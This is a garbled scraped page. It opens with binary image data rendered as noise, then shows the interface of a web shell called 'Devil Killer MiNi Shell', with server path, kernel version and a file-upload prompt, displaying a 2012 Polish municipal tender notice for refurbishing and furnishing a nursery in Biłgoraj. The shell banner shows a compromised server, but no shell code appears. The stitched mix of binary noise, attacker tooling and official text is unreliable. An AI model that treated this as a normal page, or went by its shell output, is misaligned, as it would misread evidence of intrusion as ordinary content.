JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/317168-N-2012.html

<p class="kh_header"><b>Biłgoraj: Adaptacja i wyposażenie pomieszczeń żłobka w Biłgoraju przy ulicy    Przemysłowej 50, na organizację nowych miejsc opieki nad małymi dziećmi.</b><br>
<b>Numer ogłoszenia: 317168 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Biłgoraj , Plac  Wolności 16, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6869600, faks 84 6869665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgoraj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja i wyposażenie pomieszczeń żłobka w Biłgoraju przy ulicy    Przemysłowej 50, na organizację nowych miejsc opieki nad małymi dziećmi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Adaptacja pomieszczeń na salę zajęć dla dzieci.
A. ROBOTY BUDOWLANE
- rozebranie   istniejących   ścianek   działowych   i   nośnych   oraz  wykonanie
nadproży,
-	wykucie otworów na drzwi w ścianach.
-	wykonanie nowych ścianek działowych z cegły i pustaków,
-	izolacja przeciwwilgociowa posadzki folią PCV,
-	wykonanie posadzek cementowych zbrojonych siatką i przetarciem na ostro,
-	gruntowanie podłoży preparatem gruntującym,
-	wykonanie tynków na nowych ścianach,
-	przetarcie tynków z zeskrobaniem farby na ścianach i suficie oraz ościeżach,
wstawienie nowych drzwi  fabrycznie wykończonych wraz z ościeżnicą oraz wstawienie drzwi przeciwpożarowych EI-30
-	skucie istniejących okładzin ścian z płytek glazurowanych,
wykonanie nowych tynków na  ścianach  oraz przetarcie  istniejących na ścianach i suficie,
- ułożenie paneli podłogowych w salach zajęć wraz z listwami przypodłogowymi,
- obudowa płytami kart. - gipsowymi istniejących pionów kanalizacyjnych,
-	zeskrobanie istniejącej farby na tynkach,
-	gruntowanie ścian i sufitów preparatem gruntującym oraz podłoży,
-	malowanie tynków farbą emulsyjną ścian i sufitów
-	izolacja posadzek folią PCV
-	wykonanie posadzki cementowej wraz ze zbrojeniem siatką i przetarcie na
ostro,
-	licowanie ścian płytkami 30x30 na klej wraz z wykończeniem listwami PCV,
-	wykonanie posadzek z kamieni sztucznych wielobarwnych na klej,
-	montaż skrzydeł drzwiowych fabrycznie wykończonych wraz zościeżnicami,
-	wymiana kratek wentylacyjnych,
-	przebicie otworów w ścianach,
-	wykonanie lamperii w korytarzach,
-	wykonanie ścianek działowych z desek lub płyty MDF wraz z drzwiczkami otwieranych wahadłowo,
-	wykonanie naświetli w łazience fabrycznie wykończonych przy Sali nr 1,
-	zamontowanie i podłączenie na klatce schodowej w dwóch oknach siłowników w celu automatycznego otwierania w czasie zadymienia,
-	częściowy demontaż istniejących przewodów wentylacyjnych i zaślepienie otworu po demontażu,
-	wykonanie osłon na istniejące grzejniki wraz z polakierowaniem,
-	wymiana istniejących parapetów lastrykowych na parapety z konglomeratu,
-	wywiezienie gruzu i elementów metalowych na złom (faktura na Urząd Miasta Biłgoraj)

B.INSTALACJA WOD-KAN
- demontaż i montaż  rur wodociągowych miedzianych na  ścianie  wraz  z wykuciem  bruzd  i  ich zatynkowanie
-	demontaż i montaż nowych rur kanalizacyjnych fi 50 i fi 100 w ścianie wraz z wykuciem bruzd i zatynkowanie,
-	demontaż i montaż zaworów zwrotnych i przelotowych na instalacji,
-	demontaż i montaż umywalek, brodzików, wanny i sedesów,
-	sprawdzenie szczelności wykonanej instalacji wod.-kan.
C.INSTALACJA ELEKTRYCZNA
-	demontaż istniejącej instalacji elektrycznej i wykonanie nowej (zgodnie z
dokumentacją techniczną)
-	wykonanie nowego oświetlenia na salach zajęć wraz z montażem lamp i lamp awaryjnych
-	montaż nowych wyłączników i gniazd (zgodnie z dokumentacj ą techniczną)
-	wykonanie pomiarów i sprawdzenia wykonanej instalacji elektrycznej.

II. Zakup wyposażenia

Przykładowy zestaw wyposażenia dla zadania (kolorystyka poszczególnych elementów podlega uzgodnieniu z zlecającym na etapie zakupu):
1.	ŁÓŻECZKO szt. 20 - wykonana z naturalnego drewna o wymiarach min. 124x68x80cm wraz z materacem obłożonym bawełnianym materiałem o grubości minimum 7cm,
2.	LEŻAK + prześcieradło bawełniane szt.20 - o wymiarach min. 130x54x15,5cm, łatwe do czyszczenia i składowania, o konstrukcji lekkiej.
3.	KOJEC szt. 20 - składany z elastycznymi ściankami wykonanymi z siatki, wraz z podłogą elastyczną,
4.	KRZESEŁKO DO KARMIENIA szt. 20 - wykonane z drewna 
5.	SZAFKA NA POŚCIEL szt. 2 - o wymiarach min. 83x40x190, minimum 5 półek w dwóch rzędach, 
6.	SZAFA NA PIELUCHY szt. 2 -   o wymiarach min. 83x40x190, minimum 5 półek w dwóch rzędach, 
7.	SZAFKA DO SZATNI szt.4 - o wymiarach min. 108.4x50x130cm 
z przeznaczeniem na użytkowanie przez 5 dzieci z możliwością zawieszania ubrań i półką na buty,
8.	WIESZAK ŁAZIENKOWY szt.4 - odporny na zawilgocenia w kolorze pastelowym z możliwością powieszenia 5 ręczników,
9.	SZAFKA PRZEWIJAK + PÓŁKA NA PIELUCH  szt. 2 - o wymiarach 75x55x96,5cm w kolorze seledynowym, konstrukcja szafki i półki wykonana ze sklejki, z plastikowymi szufladami oraz pojemnikami. Wszystkie naroża i krawędzie zaokrąglone dla bezpieczeństwa dziecka,
10.	SZAFKA NA NOCNIKI szt.2 - szafka wykonana ze sklejki z możliwością ustawienia 10 szt. nocników. Każda z przegródek musi zmieścić 1 nocnik o wymiarach o25 i wysokości 15cm,
11.	MEBLE NA ZABAWKI :
-	szafka szt.2 o wymiarach min. 94x45x189cm w danej szafce po środku znajduje się półka nie zabudowana, a na górnej części półki zabudowane drzwiczkami oraz w dolnej części cztery rzędy szuflad
-	szafka wisząca szt. 2 o wymiarach min. 94x35x40cm z drzwiczkami.
-	szafka stojąca szt. 2 o wymiarach min. 50x40x90cm z jednym skrzydłem drzwiowym 
-	szafka stojąca szt. 2 o wymiarach min. 50x40x90cm z czterema szufladami 
-	szafka stojąca szt.2  o wymiarach min. 107x45x90 z pełną szufladą od góry oraz z dwoma szufladami na dole. Pośrodku pólka niezabudowana podzielona na pół,

12.	STOLIK szt.5 o wymiarach blatu min. 119x74cm i wysokości zamieszczenia 46cm. Kolor blatu do uzgodnienia.
13.	KRZESŁO szt. 20 - nogi metalowe zgodne z kolorystyką stolika do uzgodnienia, wysokość siedziska 26cm.
14.	SZAFKA NA ŚRODKI CZYSTOŚCI szt. 2 o wymiarach min. 90x40x190cm minimum 5 półek zamykanych drzwiami, ,
15.	BIURKO szt.2 o wymiarach min. 110x70x74cm z szufladą i szafką zamykaną na kluczyk,
16.	SZAFA NA LEŻAKI szt. 2 - wykonana ze sklejki z możliwością ustawienia 10 leżaków. Każda z przegród powinna mieć wymiar 30x150 i głębokości 60 cm oraz półki górnej dla każdego leżaka o wymiarach min. 30x30x60cm,
17.	KOSZ UCHYLNY szt.2 - kosz uchylny plastikowy koloru żółtego lub seledynowego o pojemności minimum 20l,
18.	TABLICZKI INFORMACYJNE szt.10 - tabliczki różnych kształtów i kolorów z możliwością umieszczenia napisu,

UWAGA:

Pozycje 1, 2, 3, 4, 9, 11, 12, 13 winny spełniać Normy Bezpieczeństwa i posiadać Certyfikaty dopuszczenia do stosowania w placówkach oświatowych - żłobki.

III. Adaptacja pomieszczeń po kotłowni na pralnię
A. ROBOTY BUDOWLANE
rozebranie   istniejących   ścianek   działowych   i   nośnych   oraz  wykonanie nadproży,
-	wykucie otworów na drzwi w ścianach.
-	wykonanie nowych ścianek działowych z cegły i pustaków,
-	izolacja przeciwwilgociowa posadzki folią PCV,
-	wykonanie posadzek cementowych zbrojonych siatką i przetarciem na ostro,
-	gruntowanie podłoży preparatem gruntującym,
-	wykonanie tynków na nowych ścianach,
-	przetarcie tynków z zeskrobaniem farby na ścianach i suficie oraz ościeżach,
wstawienie nowych drzwi  fabrycznie wykończonych wraz z ościeżnicą 12,6m2
-	skucie istniejących okładzin ścian z płytek glazurowanych,
wykonanie nowych tynków na  ścianach  oraz przetarcie  istniejących na ścianach i suficie,
-	zeskrobanie istniejącej farby na tynkach,
-	gruntowanie ścian i sufitów preparatem gruntującym oraz podłoży,
-	malowanie tynków farbą emulsyjną ścian i sufitów
-	izolacja posadzek folią PCV
-	wykonanie posadzki cementowej wraz ze zbrojeniem siatką i przetarcie na
ostro,
-	licowanie ścian płytkami 30x30 na klej wraz z wykończeniem listwami PCVwykonanie posadzek z kamieni sztucznych wielobarwnych na klej,
-	montaż skrzydeł drzwiowych fabrycznie wykończonych wraz z ościeżnicami,
zamontowanie  i podłączenie  elektrycznie wentylatora zamontowanego w ścianie - l szt
-	wymiana kratek wentylacyjnych,
-	przebicie otworów w ścianach,
-	wykonanie lamperii w korytarzach,
-	wywiezienie gruzu i elementów metalowych na złom (faktura dla Urzędu
Miasta)
B.INSTALACJA WOD-KAN
-	montaż kratek kanalizacyjnych,
montaż  rur wodociągowych na  ścianie  wraz  z wykuciem  bruzd  i  ich zatynkowanie
-	montaż nowych rur kanalizacyjnych fi 50 w ścianie wraz z wykuciem bruzd i
zatynkowanie,
-	wykonanie wykopu na rury kanalizacyjne wewnątrz budynku jak i zewnątrz
wraz z przebiciem się do istniejącej studzienki kanalizacyjnej oraz zasypanie
wykopów wraz z ubiciem
-	montaż zaworów zwrotnych i przelotowych na instalacji,
-	montaż rur wywiewnych na kanalizacji,
-	wykonanie nowej instalacji kanalizacyjnej z rur PCV    fi 150 i fi 100    z
podłączeniem do studzienki kanalizacyjnej na zewnątrz budynku
-	zamontowanie i zakup l zlewozmywaku z blachy kwasoodpornej wraz z
podłączeniem do instalacji kanalizacyjnej,
-	zakup i zamontowanie baterii do zlewozmywaka wraz z szafką,
-	sprawdzenie szczelności wykonanej instalacji wod.-kan.

C.INSTALACJA ELEKTRYCZNA
-	demontaż istniejącej instalacji elektrycznej i wykonanie nowej (zgodnie z
dokumentacj ą techniczną)
-	podłączenie nowych urządzeń elektrycznych (pralki, suszarki, magiel itp),
-	wymiana istniejącej na korytarzu skrzynki TB1
-	wykonanie nowego oświetlenia na sali zajęć wraz z montażem lamp,
-	montaż nowych wyłączników i gniazd (zgodnie z dokumentacj ą techniczną)
-	wykonanie pomiarów i sprawdzenia wykonanej instalacji elektrycznej.
Szczegółowa    specyfikacja    techniczna    jest    stosowana    jako    dokument przetargowy i kontraktowy przy zleceniu i realizacji robot.
3. Informacja o terenie budowy
Teren budowy, zabudowany budynkiem piętrowym, murowanym, piętrowym. Budynek żłobka posiada instalacje wod-kan, siec elektryczną, siec gazowa, utwardzony dojazd.
4.	Organizacja robót i, przekazanie placu budowy
Wykonawca tak powinien zorganizować roboty by zapewnić bezpieczeństwo przebywającym osobom a najlepiej wykonywać te prace w okresie wakacji. Teren budowy Inwestor przekaże Wykonawcy na zasadach i w terminie określonym w umowie o wykonanie robót, wskaże dostęp do wody i energii elektrycznej.
5.	Zabezpieczenie interesów osób trzecich
Wykonawca jest odpowiedzialny za przestrzeganie obowiązujących przepisów oraz powinien zapewnić ochronę własności publicznej i prywatnej. Istniejące na terenie instalacje naziemnie i podziemne, np. kable, rurociągi i sieci powinny być wskazane Wykonawcy przez zamawiającego przy przekazaniu placu budowy. Wykonawca jest zobowiązany do zabezpieczenia instalacji i urządzeń przed ich uszkodzeniem, a także do natychmiastowego powiadomienia inspektora nadzoru i właściciela instalacji i urządzeń, jeżeli zostaną przypadkowo uszkodzone w trakcie realizacji robót. Wykonawca jest odpowiedzialny za szkody w instalacjach urządzeniach naziemnych i podziemnych spowodowane w trakcie wykonywania robot budowlanych.
6.	Wymagania dotyczące ochrony środowiska
Wykonawca będzie podejmował wszelkie niezbędne działania, aby stosować się do przepisów i normatywów zakresu ochrony środowiska na placu budowy i poza jego terenem. Będzie unikał szkodliwych działań, szczególnie w zakresie zanieczyszczeń powietrza, wód gruntowych i innych szkodliwych dla środowiska i otoczenia czynników powodowanych działalnością przy wykonywaniu robót budowlanych.
7. Warunki bezpieczeństwa i ochrona przeciwpożarowa na budowie.
Wykonawca będzie realizował roboty zgodnie ze sztuką budowlaną i zasadami BHP. Nie dopuści do pracy w warunkach niebezpiecznych, szkodliwych dla zdrowia i nie spełniających odpowiednich wymagań sanitarnych. Wykonawca dostarczy na budowę i będzie utrzymywał wyposażenie konieczne do dla
zapewnienia   bezpieczeństwa   a   także   zapewni   wyposażenie   w  urzajdzenia socjalne oraz odzież wymaganą dla personelu zatrudnionego na placu budowy. Wykonawca będzie stale utrzymywał wyposażenie przeciwpożarowe w stanie gotowości  zgodnie  z  zaleceniami  odpowiednich przepisów bezpieczeństwa przeciwpożarowego.
8.	Ogrodzenie placu budowy.
Wykonawca będzie zobowiązany do:
-	ogrodzenia i utrzymania porządku na placu budowy,
-	utrzymania czystości dróg publicznych i ulic przy placu budowy.
9.	Określenia podstawowe
Certyfikat zgodności -jest to dokument wydany przez notyfikowaną jednostkę certyfikującą, potwierdzający, że wyrób i proces jego wytwarzania są zgodne ze zharmonizowaną specyfikacją techniczną. Inspektor nadzoru inwestorskiego -osoba posiadająca odpowiednie wykształcenie techniczne i praktykę zawodową oraz uprawnienia budowlane. Reprezentuje on interesy inwestora na budowie i wykonuje bieżącą kontrolę jakości i ilości wykonywanych robót. Odbiór gotowego obiektu budowlanego - zwanym odbiorem końcowym, polegającym na protokolarnym przyjęciu (odbiorze) od wykonawcy obiektu budowlanego przez osobę lub grupę osób o odpowiednich kwalifikacjach zawodowych, wyznaczoną przez Inwestora, ale nie będącą inspektorem nadzoru inwestorskiego na tej budowie. Odbioru dokonuje się po zgłoszeniu przez kierownika budowy faktu zakończenia robót budowlanych, łącznie z uporządkowaniem terenu budowy.
Wymagania dotyczące właściwości wyrobów budowlanych
1. Wymagania   ogólne   dotyczące   właściwości   materiałów   materiałów wyrobów.
Wykonawca robót powinien przedstawić inspektorowi nadzoru inwestorskiego szczegółowe informacje o źródle produkcji, zakupów wyrobów budowlanych i urządzeń przewidywanych do realizacji robót właściwie oznaczonych, posiadających certyfikat na znak bezpieczeństwa, certyfikat zgodności, deklaracje zgodności z Polską Normą a także inne prawnie określone dokumenty.

 Materiały i wyroby dopuszczone do obrotu i stosowania w budownictwie.
-	Wykonawca jest odpowiedzialny, aby wszystkie materiały montowane lub
instalowane    w    trakcie    robot    budowlanych    odpowiadały    wymaganiom
określonym   w   art.10   ustawy   Prawo   Budowlane   oraz   w   szczegółowych
specyfikacjach technicznych.
-	Wykonawca uzgodni z inspektorem nadzoru inwestorskiego sposób i termin
przekazania informacji o przewidywanym użyciu podstawowych materiałów
oraz elementów konstrukcyjnych do wykonania robót a także o aprobatach
technicznych lub certyfikatach zgodności.
Ogólne wymagania dotyczące robót:
Przy wykonywaniu robot mogą być zatrudnieni wyłącznie pracownicy, którzy odpowiadają wymaganiom określonym w taryfikatorze kwalifikacyjnym dla danego stanowiska pracy zostali przeszkoleni w zakresie bezpieczeństwa i higieny pracy oraz uzyskali orzeczenie lekarskie o dopuszczeniu do określonej pracy. Pracownicy są zobowiązani utrzymywać w należytym stanie i porządku miejsc pracy oraz obsługiwane maszyny i urządzenia jak również eksploatować je zgodnie z przepisami techniczno-ruchowymi. Osoby kierowania i nadzoru zobowiązani są kontrolować każde stanowisko pracy i instruować pracowników o zasadach bezpieczeństwa wykonania robot.
1.	Materiały.
Roboty objęte umową powinny być zadawalające i gwarantowanej jakości oraz wykonane z materiałów dobrego handlowego gatunku.
2.	Wykonanie robót
Wykonawca przy współpracy z Zamawiającym powinien po przetargu możliwie szybko uzgodnić harmonogram robót. Roboty powinny być wykonane przez Wykonawcę zgodnie z umową. Wykonawca powinien zatrudnić tylko takich pracowników, których kwalifikacje odpowiadają wymogom i takiej liczbie, która zapewni zgodny z harmonogramem postęp robot. Wykonawca powinien dozorować roboty osobiście lub przez swoich przedstawicieli upoważnionych do reprezentowania go wobec Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.31.00.00-3, 45.44.21.00-8, 39.00.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Obowiazuje wniesienie wadium w wysokosci 4 000,00 zł (cztery tysiące zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną odpowiadającą zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, przez które należy rozumieć roboty polegające na przebudowie, remoncie obiektów budowlanych           o wartości robót co najmniej 100 000,00 zł brutto - poparte dokumentami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Do sporządzenia wykazu robót można wykorzystać załączony do SIWZ wzór zał. Nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować na czas   realizacji zadania wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia tj:
 Kierownikiem budowy - wymagania: uprawnienia budowlane do kierowania robotami w specjalności ogólno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz co najmniej 5 letnie doświadczenie w pełnieniu funkcji kierowniczych na budowie.
Do sporządzenia wykazu osób można wykorzystać wzór zał. nr 4  załączony do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Tabele elementow grup robót z wyszczególnieniem wskaźników cenotwórczych i cen wyposażenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy,                 w stosunku do treści oferty Wykonawcy, w następującym zakresie                              i okolicznościach:
3.1) zmiany terminu realizacji zamówienia: 
a)  z powodu działania siły wyższej tj. niezwykłych, nagłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego - o czas nie dłuższy niż czas równy okresowi przerwy, postoju, opóźnienia;
b) konieczności wykonania dodatkowych badań, ekspertyz, prac lub badań archeologicznych, powodujących konieczność wstrzymania robót objętych niniejszą umową - o czas niezbędny do wykonania dodatkowych czynności;
c)   wstrzymania robót z powodu okoliczności wynikających ze strony Zamawiającego -     o czas do ich ustąpienia;                                                                                                                                                                                                                                
d)  konieczności wykonania innych zamierzeń inwestycyjnych na tym samym placu budowy kolidujących z zakresem robót realizowanych przedmiotową umową -    o czas niezbędny na ich wykonanie. 
3.2) innych zmian w następujących sytuacjach: 
a) zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej  w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
